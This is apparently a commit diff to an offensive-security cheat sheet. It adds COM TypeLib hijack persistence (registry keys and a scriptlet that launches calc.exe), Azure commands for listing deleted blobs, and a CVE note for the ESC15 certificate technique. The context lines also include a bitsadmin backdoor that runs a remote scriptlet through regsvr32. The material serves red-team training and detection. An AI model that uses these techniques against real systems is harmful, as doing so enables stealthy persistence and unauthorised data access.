COM Persistence + EKUwu CVE + Deleted Blobs from Azure Storage
parent
bb0b447d12
commit
ea7e265dac
|
@ -423,7 +423,10 @@ Members : {}
|
|||
```
|
||||
|
||||
|
||||
## ESC15 - EKUwu Application Policies
|
||||
## ESC15 - EKUwu Application Policies - CVE-2024-49019
|
||||
|
||||
This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information.
|
||||
|
||||
|
||||
**Requirements**
|
||||
|
||||
|
|
|
@ -17,6 +17,40 @@ Found Storage Account - redacted.blob.core.windows.net
|
|||
|
||||
## List and download blobs
|
||||
|
||||
Visiting `https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs.
|
||||
|
||||
```xml
|
||||
<EnumerationResults ContainerName="https://<storage-name>.blob.core.windows.net/<storage-container>">
|
||||
<Blobs>
|
||||
<Blob>
|
||||
<Name>index.html</Name>
|
||||
<Url>https://<storage-name>.blob.core.windows.net/<storage-container>/index.html</Url>
|
||||
<Properties>
|
||||
<Last-Modified>Fri, 20 Oct 2023 20:08:20 GMT</Last-Modified>
|
||||
<Etag>0x8DBD1A84E6455C0</Etag>
|
||||
<Content-Length>782359</Content-Length>
|
||||
<Content-Type>text/html</Content-Type>
|
||||
<Content-Encoding/>
|
||||
<Content-Language/>
|
||||
<Content-MD5>JSe+sM+pXGAEFInxDgv4CA==</Content-MD5>
|
||||
<Cache-Control/>
|
||||
<BlobType>BlockBlob</BlobType>
|
||||
<LeaseStatus>unlocked</LeaseStatus>
|
||||
</Properties>
|
||||
</Blob>
|
||||
```
|
||||
|
||||
Browse deleted files.
|
||||
|
||||
```ps1
|
||||
$ curl -s -H "x-ms-version: 2019-12-12" 'https://<storage-name>.blob.core.windows.net/<storage-container>?restype=container&comp=list&include=versions' | xmllint --format - | grep Name
|
||||
|
||||
<EnumerationResults ServiceEndpoint="https://<storage-name>.blob.core.windows.net/" ContainerName="<storage-container>">
|
||||
<Name>index.html</Name>
|
||||
<Name>scripts-transfer.zip</Name>
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
PS Az> Get-AzResource
|
||||
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
|
||||
|
|
|
@ -242,6 +242,44 @@ bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.1
|
|||
bitsadmin /resume backdoor
|
||||
```
|
||||
|
||||
|
||||
### COM TypeLib
|
||||
|
||||
* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique
|
||||
|
||||
Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run.
|
||||
|
||||
|
||||
```ps1
|
||||
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32
|
||||
Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64
|
||||
Name: anything
|
||||
Type: REG_SZ
|
||||
Value: script:C:\1.sct
|
||||
```
|
||||
|
||||
Example of content for `1.sct`.
|
||||
|
||||
```xml
|
||||
<?xml version="1.0"?>
|
||||
<scriptlet>
|
||||
<registration
|
||||
description="explorer"
|
||||
progid="explorer"
|
||||
version="1.0"
|
||||
classid="{66666666-6666-6666-6666-666666666666}"
|
||||
remotable="true">
|
||||
</registration>
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
var WShell = new ActiveXObject("WScript.Shell");
|
||||
WShell.Run("calc.exe");
|
||||
]]>
|
||||
</script>
|
||||
</scriptlet>
|
||||
```
|
||||
|
||||
|
||||
## Serviceland
|
||||
|
||||
### IIS
|
||||
|
@ -622,4 +660,5 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
|
|||
* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
|
||||
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
|
||||
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
|
||||
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
|
||||
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))
|
||||
* [Hijack the TypeLib. New COM persistence technique - CICADA8 - October 22, 2024](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
|
Loading…
Reference in New Issue